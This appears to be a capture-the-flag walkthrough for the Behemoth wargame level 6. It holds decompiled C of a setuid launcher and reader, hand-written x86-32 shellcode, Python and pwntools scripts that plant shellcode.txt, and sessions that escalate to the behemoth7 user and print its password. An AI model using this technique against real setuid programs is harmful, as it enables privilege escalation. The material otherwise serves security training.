Behemoth6
Recordamos deshabilitar ASLR con:
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
__libc_start_main(0x80485db, 1, 0xffffd774, 0x80486d0 <unfinished ...>
popen("/behemoth/behemoth6_reader", "r") = 0x804b008
malloc(10) = 0x804b0b8
fread(0x804b0b8, 10, 1, 0x804b008) = 1
--- SIGCHLD (Child exited) ---
pclose(0x804b008) = 0
strcmp("Couldn't o", "HelloKitty") = -1
puts("Incorrect output."Incorrect output.
) = 18
+++ exited (status 0) +++
/*
 * Ghidra decompilation of the setuid launcher, evidently /behemoth/behemoth6
 * (it is the program that popen()s the reader, cf. the ltrace above). The
 * signature `undefined4 main(undefined1 param_1)` is the decompiler's guess;
 * this is an ordinary int main().
 *
 * Contract: run /behemoth/behemoth6_reader, read the first 10 bytes of its
 * stdout, and if they equal "HelloKitty" hand the caller a shell whose real
 * uid has been raised to the (setuid) effective uid. Everything hinges on
 * trusting the reader's output.
 */
undefined4 main(undefined1 param_1) {
FILE *__stream;
char *__s1;
int iVar1;
__uid_t __euid;
__uid_t __ruid;
/* The reader is started through the shell (popen) and inherits this
   process's working directory and environment. */
__stream = popen("/behemoth/behemoth6_reader","r");
if (__stream == (FILE *)0x0) {
puts("Failed to create pipe.");
/* WARNING: Subroutine does not return */
/* Exit status 0 on a failure path; a non-zero status would be conventional. */
exit(0);
}
/* Exactly 10 bytes are allocated and (up to) 10 read: no NUL terminator is
   ever stored, and the fread() result is not checked, so on a short read the
   tail of the buffer is uninitialised heap memory (malloc, not calloc). */
__s1 = (char *)malloc(10);
fread(__s1,10,1,__stream);
pclose(__stream);
/* "HelloKitty" is itself 10 characters, so a matching compare makes strcmp()
   look at __s1[10] -- one byte past the allocation -- for the terminating NUL.
   The comparison only succeeds when the heap byte after the buffer happens to
   be 0. (In the ltrace above the reader produced "Couldn't o", so the compare
   already failed at the first byte.) */
iVar1 = strcmp(__s1,"HelloKitty");
if (iVar1 == 0) {
puts("Correct.");
/* Both calls are geteuid(): the real uid is set to the effective uid so the
   spawned shell keeps the privilege instead of dropping it (matches the
   later `id` output, uid=13007(behemoth7)). */
__euid = geteuid();
__ruid = geteuid();
setreuid(__ruid,__euid);
/* The variadic argument list should be terminated with (char *)NULL rather
   than the int 0; on ABIs where int and pointer sizes differ this is UB. */
execl("/bin/sh","sh",0);
}
else {
puts("Incorrect output.");
}
return 0;
}
/*
 * Ghidra decompilation of what is evidently /behemoth/behemoth6_reader (the
 * program popen()ed above; it is the one that looks for shellcode.txt and
 * prints the "Couldn't open" message seen in the ltrace).
 *
 * It loads a file from the current working directory into a heap buffer,
 * rejects the file if any byte equals 0x0b, and then jumps into the buffer.
 * Its stdout is what behemoth6 compares against "HelloKitty", so whoever
 * controls the working directory controls both the code executed here and
 * the bytes that behemoth6 trusts.
 */
undefined4 main(undefined1 param_1) {
FILE *__stream;
size_t __size;
code *__ptr;
int local_14;
/* Relative path: resolved against the cwd inherited from the parent, not
   against a fixed, trusted location. */
__stream = fopen("shellcode.txt","r");
if (__stream == (FILE *)0x0) {
puts("Couldn\'t open shellcode.txt!");
}
else {
/* 2 == SEEK_END. ftell() returns long and -1 on error, which becomes a huge
   size_t here; neither ftell() nor the malloc()/fread() below is checked,
   and an empty file yields malloc(0), whose result is then called. */
fseek(__stream,0,2);
__size = ftell(__stream);
rewind(__stream);
__ptr = (code *)malloc(__size);
fread(__ptr,__size,1,__stream);
fclose(__stream);
/* Byte-level filter: the whole file is rejected if any single byte is 0x0b.
   The "Write your own shellcode." message suggests this targets the x86-32
   execve syscall number; it is the only validation performed. Note the loop
   bound casts the size_t length to int (signed/unsigned mismatch). */
local_14 = 0;
while (local_14 < (int)__size) {
if (__ptr[local_14] == (code)0xb) {
puts("Write your own shellcode.");
/* WARNING: Subroutine does not return */
exit(1);
}
local_14 = local_14 + 1;
}
/* Transfers control to the file contents. This can only work if the heap is
   mapped executable (presumably the binary was built without NX); control
   returns to the `return 0` below only if the executed code itself returns. */
(*__ptr)();
}
return 0;
}
/*
 * Minimal stand-in that produces the output behemoth6 expects from the
 * reader: the literal "HelloKitty" (puts() appends a newline), exit status 0.
 */
int main(void)
{
    static const char greeting[] = "HelloKitty";

    puts(greeting);
    return 0;
}
; x86-32 Linux sequence that reproduces the reader's expected output: it
; writes "HelloKitty" to stdout and exits. The three pushes build the string
; on the stack (little-endian, so each dword below reads reversed); the
; encoded bytes contain no 0x0b, which is the one byte the reader rejects.
push 0x00007974          ; "ty\0\0"
push 0x74694B6f          ; "oKit"
push 0x6c6c6548          ; "Hell" -> esp now points at "HelloKitty\0\0"
mov ebx, 0x1             ; fd = 1 (stdout)
mov ecx, esp             ; buf = the string just pushed
mov edx, 0xc             ; count = 12 (10 chars + two NULs; behemoth6 only reads 10)
mov eax, 0x4             ; SYS_write
int 0x80                 ; write(1, esp, 12)
mov eax, 1               ; SYS_exit
mov ebx, 0               ; status = 0
int 0x80                 ; exit(0)
https://defuse.ca/online-x86-assembler.htm#disassembly
\x68\x74\x79\x00\x00\x68\x6F\x4B\x69\x74\x68\x48\x65\x6C\x6C\xBB\x01\x00\x00\x00\x89\xE1\xBA\x0C\x00\x00\x00\xB8\x04\x00\x00\x00\xCD\x80\xB8\x01\x00\x00\x00\xBB\x00\x00\x00\x00\xCD\x80
import sys
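# Machine code taken verbatim from the assembled listing above (x86-32:
# write(1, "HelloKitty\0\0", 12) followed by exit(0)). It is kept as a bytes
# literal so the file is written byte-for-byte on both Python 2 and Python 3;
# the original str literal written through a text-mode handle is re-encoded
# as UTF-8 on Python 3 (every byte >= 0x80 becomes two bytes), which silently
# corrupts the payload.
PAYLOAD = b"\x68\x74\x79\x00\x00\x68\x6F\x4B\x69\x74\x68\x48\x65\x6C\x6C\xBB\x01\x00\x00\x00\x89\xE1\xBA\x0C\x00\x00\x00\xB8\x04\x00\x00\x00\xCD\x80\xB8\x01\x00\x00\x00\xBB\x00\x00\x00\x00\xCD\x80"

# Binary mode: no newline translation and no text encoding. The context
# manager closes the handle even if the write raises.
with open("shellcode.txt", "wb") as f:
    f.write(PAYLOAD)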
behemoth6@behemoth:/tmp/Marmeus$ python E6.py; /behemoth/behemoth6_reader; /behemoth/behemoth6
HelloKittyCorrect.
$ cat /etc/behemoth_pass/behemoth/behemoth7
cat: /etc/behemoth_pass/behemoth/behemoth7: No such file or directory
$ id
uid=13007(behemoth7) gid=13006(behemoth6) groups=13006(behemoth6)
from pwn import *
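# Generate shellcode.txt with pwntools' assembler. The source is the same
# x86-32 sequence as the hand-assembled listing above: push "HelloKitty\0\0"
# onto the stack, write(1, esp, 12), then exit(0).
shellcode = """
push 0x00007974
push 0x74694B6f
push 0x6c6c6548
mov eax, 0x4
mov ebx, 0x1
mov ecx, esp
mov edx, 0xc
int 0x80
mov eax, 1
mov ebx, 0
int 0x80
"""

# asm() returns bytes on Python 3, so the file must be opened in binary mode;
# the original text-mode open only worked on Python 2, where str is bytes.
# The context manager closes the handle even if asm() raises.
with open('shellcode.txt', 'wb') as output:
    output.write(asm(shellcode))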
behemoth6@behemoth:/tmp/x4v1tmp$ cat <<EOF>> shell_gen.py
> from pwn import *
>
> output = open('shellcode.txt', 'w')
>
> shellcode = """
> push 0x00007974
> push 0x74694B6f
> push 0x6c6c6548
>
> mov eax, 0x4
> mov ebx, 0x1
>
> mov ecx, esp
> mov edx, 0xc
>
> int 0x80
> mov eax, 1
> mov ebx, 0
> int 0x80
> """
>
> output.write(asm(shellcode))
> output.close()
> EOF
behemoth6@behemoth:/tmp/x4v1tmp$ python shell_gen.py
behemoth6@behemoth:/tmp/x4v1tmp$ /behemoth/behemoth6
Correct.
$ id
uid=13007(behemoth7) gid=13006(behemoth6) groups=13006(behemoth6)
$ cat /etc/behemoth_pass/behemoth7
baquoxuafo
$